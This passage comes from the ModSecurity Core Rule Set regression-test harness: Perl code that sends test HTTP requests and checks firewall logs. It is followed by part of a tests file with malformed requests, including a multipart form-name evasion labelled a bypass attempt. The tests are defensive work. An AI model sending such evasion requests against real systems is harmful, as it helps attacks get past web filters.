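    my ($line, $state, $file) = @_;

    # -- Handle EOF
    return $state unless defined $line;

    # -- Handle multi line remarks
    if ($state->{'multi_line_cmd'} eq "remark") {
        undef $state->{'multi_line_cmd'} if ($line =~ /^\%endremark/i);
        return $state;
    }

    # -- Handle multi line directives
    if (my $incmd = $state->{'multi_line_cmd'}) {

        # -- Request parser
        if ($incmd =~ /^request$/i) {
            if (my ($len) = $line =~ /^Content-Length: (\d+)$/) {
                $state->{'request_len'} = $len;
            }
            elsif ($state->{'request_state'} eq 'headers' && $line =~ /^$/) {
                $state->{'request_state'} = 'body';
                $state->{'multi_line_value'} .= "$line\x0D\x0A";
                if (defined $state->{'request_len'}) {
                    # The body is read raw, by length, so it may contain
                    # lines starting with "%" without ending the request.
                    my $result = read $file, my $buffer, $state->{'request_len'};
                    return "Error 110: Error reading file" if !defined $result;
                    return "Error 111: File terminated unexpectedly (read $result char of required $state->{'request_len'})"
                        if $result != $state->{'request_len'};
                    $state->{'multi_line_value'} .= $buffer;
                    # request_len is cleared when the directive ends, below.
                    return $state;
                }
            }
        }
        # X-Real-Content-Length:

        # -- Append to value if not yet next directive
        if ($line !~ /^\%/) {
            $state->{'multi_line_value'} .= "$line\x0D\x0A";
            return $state;
        }

        # -- Otherwise use directive
        $state = use_test_directive ($state, $incmd, $state->{'multi_line_value'}, $state->{'multi_line_global'});
        return $state if (!ref $state);
        undef $state->{'multi_line_cmd'};
        undef $state->{'multi_line_value'};
        undef $state->{'request_len'};
    }

    # -- Handle empty lines and single line remarks
    return $state if $line =~ /^\s*(\#|$)/;

    # -- Parse directive
    my ($global);
    # A line that is not a directive must be rejected here; otherwise $1/$2
    # would still hold the captures of an earlier, unrelated match.
    if ($line !~ /^\%(\w+)\s*(.*)?$/) {
        return "Error 102: syntax error";
    }
    my ($cmd, $operand) = ($1,$2);
    if ($cmd =~ /^global$/i) {
        $global = 1;
        ($cmd, $operand) = ($operand =~ /^\s*(\w+)\s*(.*)?$/);
    }
    # A directive without operand is a boolean: "%x" sets 1, "%nox" sets 0.
    if (!$operand) {
        $operand = 1;
        if ($cmd =~ /^no(.*)$/) {
            $cmd = $1;
            $operand = 0;
        }
    }
    $cmd = lc $cmd;

    # -- Start multi line directives
    if ($cmd =~ /^(?:request|remark)$/i) {
        $state->{'multi_line_cmd'} = $cmd;
        $state->{'multi_line_global'} = $global;
        return $state;
    }

    return use_test_directive ($state, $cmd, $operand, $global);
}

# -- apply one parsed directive to the state
#    Returns the state to continue with, or an error message string.
sub use_test_directive {
    my ($state, $cmd, $operand, $global) = @_;

    # -- Simple directives
    if ($cmd =~ /^(?:server|port|hostname|timeout|verbose|relevant|mslog|msdebug|request|uri|request|fuzz|clean|pause)$/i) {
        if ($global) {
            $state->{'global'}->{$cmd} = $operand;
        }
        $state->{$cmd} = $operand;
        $state->{'request_state'} = 'headers';
    }

    # -- List directives
    elsif ($cmd =~ /^(?:status|remote_event|event|audit|output)$/i) {
        push_state ($state, $state->{'global'}, $cmd, $global, $operand);
    }

    # -- Variable assignment
    elsif ($cmd =~ /^(?:var)$/i) {
        my ($var, $values) = ($operand =~ /\s*(\w+)\s*=\s*?(.*)/);
        my @values = split /\s*,\s*/, $values;
        push_state ($state->{'vars'}, $state->{'global'}->{'vars'}, $var, $global, @values);
    }

    # -- End test (return to file context)
    elsif ($cmd =~ /endtest/i) {
        if ($state->{'name'}) {
            push @{$state->{'parent'}->{'tests'}}, $state;
        }
        else {
            return "Error 107: %endtest directive without a preceding %test directive";
        }
        $state = $state->{'parent'};
    }

    # -- New test (end test and start a new one)
    elsif ($cmd =~ /test/i) {
        if ($state->{'name'}) {
            push @{$state->{'parent'}->{'tests'}}, $state;
            $state = inherit_state ($state->{'parent'});
        }
        else {
            $state = inherit_state ($state);
        }
        $state->{'name'} = $operand;
    }

    # -- error
    else {
        return "Error 102: syntax error";
    }

    return $state;
}

# -- handle a pending %clean: delete the log files and restart apache
sub reconfigure {
    my ($state) = @_;

    my ($restart) = 0;
    if ($state->{'clean'}) {
        # The paths come from options / test files and are deleted as-is.
        unlink $state->{'mslog'} if $state->{'mslog'};
        unlink $state->{'msdebug'} if $state->{'msdebug'};
        $restart = 1;
        global_clear ($state, 'clean');
    }

    if ($restart) {
        print "## Restarting apache\n";
        # Fixed command line, no test data is interpolated into it.
        print STDERR `/usr/local/apache/bin/apachectl restart`;
        sleep (1);
    }
}

# -- create a child state: a deep copy that shares the global state
sub inherit_state {
    my ($state) = @_;

    my $clone = dclone $state;
    $clone->{'parent'} = $state;
    $clone->{'global'} = $state->{'global'};
    delete $clone->{'tests'};
    return $clone;
}

# -- Add values to key in state taking into account both overriding and global
sub push_state {
    my ($hash, $global_hash, $key, $global, @values) = @_;

    if ($global) {
        push @{$global_hash->{$key}}, @values;
    }
    elsif (!$hash->{"_OVERRIDE_$key"}) {
        # First local use in this scope replaces the inherited list.
        $hash->{$key} = [];
    }
    $hash->{"_OVERRIDE_$key"} = 1;
    push @{$hash->{$key}}, @values;
}

# -- clear a key in a state and in all of its ancestors
sub global_clear {
    my ($state, $key) = @_;

    while ($state) {
        undef $state->{$key};
        $state = $state->{'parent'};
    }
}

# -- number of lines currently in a file (0 if it cannot be opened)
#    Replaces a shell call to wc so that a log path from a test file is
#    never interpreted by a shell.
sub _count_lines {
    my ($path) = @_;

    open my $fh, '<', $path or return 0;
    my $count = 0;
    $count++ while <$fh>;
    close $fh;
    return $count;
}

# -- text of a file after its first $skip lines ('' if it cannot be opened)
#    Replaces a shell call to tail, for the same reason as _count_lines.
sub _read_lines_after {
    my ($path, $skip) = @_;

    open my $fh, '<', $path or return '';
    my $seen = 0;
    my $text = '';
    while (defined(my $line = <$fh>)) {
        $seen++;
        $text .= $line if $seen > $skip;
    }
    close $fh;
    return $text;
}

# -- send the request(s) of one test and report the result
sub run_test {
    my ($outfile, $state, $file) = @_;

    return if $state->{'check'};

    # NOTE: -from / -run values and the %status, %audit, %output patterns are
    # used as regular expressions; they are tester supplied by design.
    if ($state->{'from'}) {
        return if $state->{'name'} !~ /$state->{'from'}/;
    }
    global_clear ($state, 'from');

    my $do_test = $#{$state->{'run'}} < 0;
    foreach my $select (@{$state->{'run'}}) {
        $do_test ||= ($state->{'name'} =~ /$select/);
    }
    return if !$do_test;

    if ($state->{'request'} && $state->{'uri'}) {
        print STDERR "Error 103: cannot use both %request and %uri in test $state->{'name'} in file $file\n";
        exit;
    }

    reconfigure($state);

    if ($state->{'uri'}) {
        $state->{'request'} = $SKELETON_REQUEST;
        $state->{'request'} =~ s/\$URI/$state->{'uri'}/;
    }

    my $requests = $state->{'fuzz'}
        ? generate_vectors ($state->{'request'}, $state->{'vars'}, $state->{'verbose'})
        : {'' => $state->{'request'}};

    VECTOR: while (my ($vars, $request) = each %$requests) {
        my $test = inherit_state ($state);
        $test->{'request'} = $request;

        # Remember whether log files were configured: further down the
        # 'mslog' / 'msdebug' entries are overwritten with log *content*.
        my $mslog_path   = $test->{'mslog'};
        my $msdebug_path = $test->{'msdebug'};
        if ($mslog_path) {
            $test->{'mslog_start'} = _count_lines ($mslog_path);
        }
        if ($msdebug_path) {
            $test->{'msdebug_start'} = _count_lines ($msdebug_path);
        }

        my ($server, $port) = ($test->{'server'}, $test->{'port'});
        if (!$port && ($server =~ /^(.+)\:(\d+)$/)) {
            $server = $1;
            $port = $2;
        }

        my $sock = IO::Socket::INET->new(PeerAddr => $server, PeerPort => $port);
        if (!$sock) {
            print STDERR "Error 104: error connecting to server $server. $@\n";
            exit;
        }
        print $sock $request;

        # Read the response line by line until EOF or timeout.
        my $line;
        do {
            my @ready;
            @ready = IO::Select->new($sock)->can_read($test->{'timeout'});
            if ($#ready < 0) {
                $test->{'response'} = $test->{'response_status'} = "N/A";
                report_test ($outfile, 'TIMEOUT', $test, $request, $vars);
                next VECTOR;
            }
            if (defined($line = <$sock>)) {
                $test->{'response'} .= $line;
                if (!$test->{'response_status'}) {
                    if ($line =~ /^HTTP\S*\s+(\d+)/) {
                        $test->{'response_status'} = $1;
                    }
                    elsif ($line =~ /<title>400 Bad Request<\/title>/) {
                        $test->{'response_status'} = 400;
                    }
                }
            }
        } while (defined($line));

        # Keep only the log lines written since the request was sent.
        if ($mslog_path) {
            $test->{'mslog'} = _read_lines_after ($mslog_path, $test->{'mslog_start'});
        }
        if ($msdebug_path) {
            $test->{'msdebug'} = _read_lines_after ($msdebug_path, $test->{'msdebug_start'});
        }

        $test->{'match_status'} = check_match ($test->{'response_status'}, $test->{'status'});
        $test->{'match_output'} = check_match ($test->{'response'}, $test->{'output'});

        # Audit and event checks are skipped only when no audit log is
        # configured. Testing the (now overwritten) log content instead made
        # a test with expected events pass whenever nothing was logged.
        $test->{'match_audit'} = !$mslog_path || check_match ($test->{'mslog'}, $test->{'audit'});

        my $test_events = [];
        foreach my $event (@{$test->{'event'}}) {
            if ($event =~ /^\!(.*)$/) {
                push @$test_events, "!\\[id \\\"$1\\\"\\]"
            }
            else {
                push @$test_events, "\\[id \\\"$event\\\"\\]"
            }
        }
        $test->{'match_events'} = !$mslog_path || check_match ($test->{'mslog'}, $test_events);

        my $result = ($test->{'match_status'} && $test->{'match_output'} && $test->{'match_audit'} && $test->{'match_events'})
            ? "OK"
            : "FAIL" ;
        report_test ($outfile, $result, $test, $request, $vars);

        sleep $test->{'pause'} if $test->{'pause'};
    }
}

# -- true if $text satisfies every pattern; a leading "!" negates a pattern
sub check_match {
    my ($text, $patterns) = @_;

    my $match = 1;
    foreach my $pattern (@$patterns) {
        if ($pattern =~ /^\!(.*)$/) {
            return 0 if $text =~ /$1/sm;
        }
        else {
            return 0 if $text !~ /$pattern/sm;
        }
    }
    return $match;
}

sub report_header {
    my ($outfile, $outfilename) = @_;

    print $outfile "\nModSecurity rules test report generated to $outfilename on " . localtime() . "\n";
    print $outfile "Produced by rulestest.pl, (c) Trustwave Holdings Inc, 2012\n";
}

sub report_file_header {
    my ($outfile, $filename) = @_;

    print $outfile "\n## reading tests file $filename\n";
}

# -- write the result line (and, on request, the details) of one test
sub report_test {
    my ($outfile, $result, $test, $request, $vars) = @_;

    print $outfile "\n" if $result ne "OK";
    print $outfile "$result: ";
    print $outfile "$test->{'name'}";
    print $outfile " ($vars)" if $vars;
    print $outfile ", status = $test->{'response_status'}";
    #print $outfile ", X-WAF-Event Match" if ($test->{'match_output'});

    # At this point 'mslog' holds the new audit log lines of the test.
    my (@events) = ($test->{'mslog'} =~ /\[id \"(\d+)\"\]/gim);
    my $event_summary = $#events < 0
        ? ", no events received"
        : ", event(s) = " . (join ",", @events);
    print $outfile $event_summary;

    if ($result eq "FAIL") {
        print $outfile "\n";
        if (!$test->{'match_status'}) {
            print $outfile "Expected status code(s): " . (join ",", @{$test->{'status'}}) . "\n";
        }
        if (!$test->{'match_events'}) {
            print $outfile "Expected event(s): " . (join ",", @{$test->{'event'}}) . "\n";
        }
        if (!$test->{'match_audit'}) {
            print $outfile "Audit does not match\n";
        }
        if (!$test->{'match_output'}) {
            print $outfile "Output does not match\n";
        }
        print_details ($test) if $test->{'verbose'} || $test->{'relevant'};
    }
    print $outfile "\n";
    print_details ($test) if $test->{'verbose'};
}

# -- write request, response and log excerpts to the report
#    Uses the file-level $outfile handle.
sub print_details {
    my ($test) = @_;

    print $outfile "---------\nRequest:\n$test->{'request'}\n";
    print $outfile "---------\nResponse:\n$test->{'response'}\n";
    print $outfile "---------\nLog:\n$test->{'mslog'}\n" if ($test->{'mslog'});
    print $outfile "---------\nDebug:\n$test->{'msdebug'}\n" if ($test->{'msdebug'});
}

# -- expand a request template into one request per combination of %var values
#    Returns a hash ref: "var=value,..." description => request text.
sub generate_vectors {
    my ($script, $vars, $verbose) = @_;

    my $test_requests = [];
    my $vectors = [ {} ];

    while (my ($var, $values) = each %$vars) {
        next if $var =~ /^_OVERRIDE_/;
        next if $script !~ /\$$var\b/;
        foreach my $vector (@$vectors) {
            $vector->{$var} = $values->[0];
        }
        if ($#$values > 0) {
            my $collect_vectors = [];
            shift @$values;
            foreach my $value (@$values) {
                my $new_vectors = dclone $vectors;
                foreach my $vector (@$new_vectors) {
                    $vector->{$var} = $value;
                }
                push @$collect_vectors, @$new_vectors;
            };
            push @$vectors, @$collect_vectors;
        }
    }

    # Turn "$name" into "$vector->{name}" so the template can be evaluated.
    $script =~ s/\$([a-zA-Z_]+)/\$vector->{$1}/g;

    my $results;
    # "our": the Safe compartment in eval_expression shares the package
    # variable $vector, not a lexical.
    foreach our $vector (@$vectors) {
        my $var = join ",", map { "$_=$vector->{$_}" } keys %$vector;

        # First pass keeps $CONTENT_LENGTH literal, to measure the body.
        $vector->{'CONTENT_LENGTH'} = '$CONTENT_LENGTH';
        my $result;
        if (!defined($result = eval_expression ($script, $vector, $verbose))) {
            print STDERR "Error 109: unable to fuzz request. Not fuzzing test.\n";
            return ({'' => $script});
        }

        #my $req = HTTP::Request->parse($result);
        # Use the capture of THIS match: when the request has no CRLF CRLF
        # separator, $1 would still hold a value from an earlier match.
        my ($content) = $result =~ /.*?\x0D\x0A\x0D\x0A(.*)/sm;
        $vector->{'CONTENT_LENGTH'} = defined $content ? length $content : 0;

        $result = eval_expression ($script, $vector, $verbose);
        $results->{$var} = $result;
    }

    return $results;
}

# -- interpolate a request template
#    Returns the resulting text, or undef on an evaluation error or warning.
#
#    NOTE(security): the template comes from a tests file and is evaluated as
#    a double-quoted Perl string. Only '"', '@' and '%' are escaped, and the
#    Safe compartment (default operator mask) is the only containment, so
#    tests files must be treated as code: run only files you trust.
sub eval_expression {
    my ($script, $vector, $verbose) = @_;

    $script =~ s/([\"\@\%])/\\$1/g;

    my $result;
    my $warn;
    local $SIG{__WARN__} = sub { $warn = $_[0] };
    eval {
        my $safe = Safe->new;
        $safe->share ('$vector');
        $result = $safe->reval ("return \"$script\"");
    };
    if ((my $error = $@) || $warn) {
        print STDERR "Error 108: unable to evaluate expression\n";
        print STDERR "SCRIPT: $script\n" if $verbose;
        print STDERR "EVAL ERROR: $error\n" if $error && $verbose;
        print STDERR "EVAL WARNING: $warn\n" if $warn && $verbose;
        return;
    }
    return $result;
}

# -- remove the first line terminator, whatever its flavour
sub tchomp {
    my ($text) = @_;

    $text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029})/$1/s;
    return $text;
}

__END__

=head1 NAME

rulestest.pl

=head1 SYNOPSIS

rulestest.pl [options] [test files ...]

This program reads and executes tests in input test file(s) against a
ModSecurity protected web application.

use -help for options.

use -man for detailed usage information.

=head1 OPTIONS

the following options can be used either on the command line or (using the
long version) as directives (prefixed by %) in test files.

-s or -server <address>[:<port>]

address of server to send. Mandatory before any test, but can appear in the
test files themselves

-p or -port <port>

port to send tests to, defaults to 80

-t or -timeout <time>

time in seconds, possibly fractional, to wait for server response. If the
server does not respond within this period the test fails. the default is
2 seconds. Timeout should be small for synthetic tests, such as those
generated from capture files as the server would respond fast. The timeout
may need to be longer for real world servers.

-f or -fuzz

Whether to use fuzzing or not.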
You may not want to use fuzzing in case the requests were generated automatically and may include syntax that will be considered by rulestest as substitutable variables. -mslog <file name> ModSecurity log file to search for events in. If not specified, events are not checked (useful if tests are not run locally). -msdebug <file name> ModSecurity debug file to extract debug information to test report. If not specified, debug information is not added to the report. -o <file name> name of output file. Defaults to STDOUT. Not relevant as directive in test files. -i <file name> Names of input files. can also appear as parameters on the command line. Not relevant as directive in test files. -check Does not run test but only parses the input file -run <regular expression> a regular expression to select tests to perform. Only tests whose name match the regular expression are executed. The option (or directive) can be used multiple times, so a test matching any of the regular expressions will be executed. -from <regular expression> a regular expression selecting the first test to perform. -r or -relevant Detailed information in the test report in case of a test failure. -v or -verbose Detailed information for all tests. Verbose will also cause specific errors to print more information. -c or -clean deletes log and debug files and restarts apache (using apachectl). Significantly enhances performance of the tests and can be used as many times as needed in test files. Clean is executed once, when starting the 1st test after it is defined regardless of the scope it is defined at. Specifically it will remove the log and debug files as defined when the test starts: this enables the use of -clean on the command line even though file locations are defined only later on, for example in rulestest.conf. Because the files named by %mslog and %msdebug are deleted, point these settings only at files that are safe to remove. =head1 INSTALLATION & CONFIGURATION Test should be run from the same host ModSecurity runs on, or a computer that has file system access to ModSecurity audit log.
This allows rulestest to examine ModSecurity audit log for events and extract information from ModSecurity debug log to the test report. In order to test for events, ensure that ModSecurity is set use serial logging. =head2 Local and Global Settings: When used in a file, directives are local to the file, and when used whithin a test they are local to a test. To specify global settings preced the directive wiht the keyword global: %global server 127.0.0.1:80 if a file with the name rulestest.conf exists in the same directory as the script, it will be read. I can contain any directive valid in a test file. It can be used to set default =head2 Binary Attrbiutes: Directives that except a yes/no value can be set in varios ways. Providing the value 0 or 1 will set them to no and yes respectively. The directive without any values is eqvivalent to setting it to 1, and the directive preceded by "no" is eqvivalent to 0, for example: %noverbose will set the current scope to not report verbosely. =head2 Default Settings: The file rulestest.conf is automatically read by rulestest.pl before any tests file and may contain global setup directives. You may especially want to set there settings such as %server, %mslog and %msdebug as well as reporting level using %verbose and %relevant. =head1 WRITING TESTS To write a test use the following directives: =head2 defining the test request %test <name> - starts a test and set is name as shown in the report %endtest - used to terminate a test. Ususally there is no need to use this directive as the next %test directive implicitly defines the end of a test. You may want to use it if you want to set additional file level settings for the remaining tests. %remark - Ignore all lines (including directives) until a matching %endremark directive. use # at the beginning of a line to add a remark line to the file, if not in the middle of a multi-line directive such as %request. 
%request - multiple lines of the request should appear on the lines follwing the directive terminated by the next =directive (a line starting with "%"). Do not forget to leave an empty line as required by HTTP. You can use the special variable $CONTENT_LENGTH to have rulestest set the correct content length for the request. $CONTENT_LENGTH can save counting, but its main use is to enable fuzzing of requests with variables in the post data. %uri - a uri to send to the server. it would be embedded in a standard request %pause - define a delay in seconds after the test and before the next test. Useful if the feature tested involves timeouts. either a %uri or a %request directive must appeat in a test. A %request or a %uri can include variables using perl notation ($varname). this would be replaced when testing with a value set by the %var directive. Empty lines are skipped if not in the middle of multi-line directives such as %request. =head2 defining expected output %status <regexp> - The expected response status code(s). %event <regexp> - A regexp that should match event ids generated by the test in the audit log. %audit <regexp> - A regexp that should match in the audit log of the test. %output <regexp> - A regexp that should match in set a string to search in the HTTP response. You can use multiple directives to define many required patterns. for %event, %audit and %output you can use multiple directives to define many required patterns. All of them must match for the rule to match. Use the regular expresion or (|) option to check for at least one option from a group of patterns. Each regular expression can be preceded by a "!" mark to negate the test. the regular expression following must not appear in the test result. =head1 REPORTING By default rulestest will provide brief message describing if the test succeded in any of the checks done: status code, events generated, pattern in audit log and pattern in response. 
The following directives allow control on the level of details of the report: %verbose - from the test for which the directive appears onward, output request, reply and new ModSecurity audit log lines for each test. Set to 0 to stop (1 is implicit on set). %relevant - from the test for which the directive appears onward, output verbose output for tests that failed any check. Set to 0 to stop (1 is implicit on set). In most cases, you will only be interested in the failed tests. In that case, you can use awk with the following command: gawk '$1=="OK:" {printme=0}; $1=="FAIL:" {printme=1}; $1=="##" {printme=1}; printme==1 {print}' =head1 VARIABLE SUBSTITUTION (FUZZING) The directive "%var variable=value[, value[, value...]]" sets values for a variable which are embedded in the request sent. The test would be repeated using every value. Values are set only for the current test. Use the %globalvar directive to set global variables. Multiple %var directives for the same variable add values to the list and do not replace values, so: %var variable=value1 %var variable=value2 Would test with both value1 and value2. If multiple variables are used in the same test, then the test is carried out for each combination of values of the variables: %var var1=v1, v2 %var var3=v3, v4 The test would be repeated 4 times with the test vectors (v1, v3), (v1, v4), (v2, v3), (v2, v4). As noted before, the special variable $CONTENT_LENGTH can be used to automatically calculate the content length based on the actually generated request after variable substitution. =head1 TESTING RESPONSES In order to run outbound tests, the script testserver.cgi has to be installed in the web server's /cgi-bin directory. Install it only on a server dedicated to testing, since it lets any client dictate the status, headers and content of the response. To force response content in request, use /cgi-bin/testserver.cgi as the target URL and add one or more of the following headers to the request: Response-Status: - Force a response status line. Defaults to "200 OK". Response-Content: - Adds the string to the response. 
Note that this would not be the entire response. Response-Content-Type: - sets the value of the content type header, defaults to "text/html" Response-Header-Name: - Adds a header to the response. This defines the new header's name. Response-Header-Value defines the header's value. Response-Header-Value: - The value of the new header defined by the request header Response-Header-Name. Note: If Response-Header-Name is empty, then this parameter will be ignored. =head1 ERRORS Error 101: test file <file> not found. Check that all options are valid and no option was considered a test file. Error 102: syntax error in file <file> on line <line>. A line which is not a remark, not a directive and not in any multiline section (request and multi line remark) was found at specified line and file. Error 103: cannot use both %request and %uri. Only one of these directives can be specified in each test. Error 104: error connecting to server. The specific error is also displayed. This error usually implies a communication problem or specification of a wrong server or port. Error 105: Error occurred when trying to open a tests file. Tests will continue with next tests file. Error 106: Error occurred when trying to create report file. Error 107: %endtest directive without a preceding %test directive Error 108: The expression evaluator (using Perl eval function) failed. The expression probably includes some Perl syntax. Use -verbose to print the actual error returned. Error 109: Fuzzing the request failed. This probably implies that the test request includes some Perl syntax. You may want to use the nofuzz option to overcome the problem. Because expressions and fuzzed requests are evaluated by Perl, run only tests files that come from a source you trust. 
=cut ������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests/�������������������������������0000775�0000000�0000000�00000000000�12164572564�0026163�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_20_protocol_violations.tests��������������������������������������������������������0000775�0000000�0000000�00000050722�12164572564�0037110�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 20 - protocol violations %test Invalid HTTP Request Line (960911) - Test 1 ##################################################### %remark This test has a TAB character before the request method. %endremark %status 400|403 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive %test Invalid HTTP Request Line (960911) - Test 2 ##################################################### %remark This test uses backslashes instead of forward slashes. 
%endremark %status 400|403 %request GET \\index.html HTTP\1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive %test Invalid HTTP Request Line (960911) - Test 3 ##################################################### %remark This test has a pipe character before the request method. %endremark %status 400|403|501 %output 960911 %request |GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Keep-Alive: 300 Proxy-Connection: keep-alive %test Attempted multipart/form-data bypass (960000) ##################################################### %remark This test attempts form name parsing evasion using '. %endremark %output 960000 %request POST /cgi-bin/fup.cgi HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:15.0) Gecko/20100101 Firefox/15.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://localhost/upload.html Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 Content-Length: $CONTENT_LENGTH -----------------------------627652292512397580456702590 Content-Disposition: form-data; name=x';filename="';name=contact.txt;" Content-Type: text/plain email: security@modsecurity.org -----------------------------627652292512397580456702590 Content-Disposition: form-data; name="note" Contact info. 
-----------------------------627652292512397580456702590-- %test Failed to parse request body (960912) ##################################################### %remark Part missing Content-Disposition header %endremark %output 960912 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Contt-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %test Multipart request body failed strict validation (960914) ##################################################### %output 960914 %remark Invalid Quoting %endremark %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Content-Disposition: form-data; name='name; filename="'; name=payload;" Content-Type: application/octet-stream 
Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %test Multipart parser detected a possible unmatched boundary (960915) ##################################################### %remark Unmatched final boundary %endremark %output 960915 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Content-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915725-- %test Invalid Request Body (960000) ##################################################### %remark Invalid Quoting %endremark %output 960000 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: multipart/form-data; boundary=---------------------------265001916915724 
Content-Length: $CONTENT_LENGTH -----------------------------265001916915724 Content-Disposition: form-data; name="fi;le"; filename="test" Content-Type: application/octet-stream Rotem & Ayala -----------------------------265001916915724 Content-Disposition: form-data; name="name" tt2 -----------------------------265001916915724 Content-Disposition: form-data; name="B1" Submit -----------------------------265001916915724-- %test Invalid Request Body/XML (960912) ##################################################### %remark Incorrect ending error tag </err> %endremark %output 960912 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.3.2/form.html Content-Type: text/xml Content-Length: $CONTENT_LENGTH <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <SOAP-ENV:Body> <xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2"> <xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism> <xkms:RespondWith>http://www.w3.org/2002/03/xkms#X509Cert</xkms:RespondWith> </xkms:StatusRequest> </SOAP-ENV:Body><error></err> </SOAP-ENV:Envelope> %test Content-Length HTTP header is not numeric (960016) ##################################################### %remark When Apache receives multiple headers with the same name, it will concatenate them into one header with commas separating the individual payloads. 
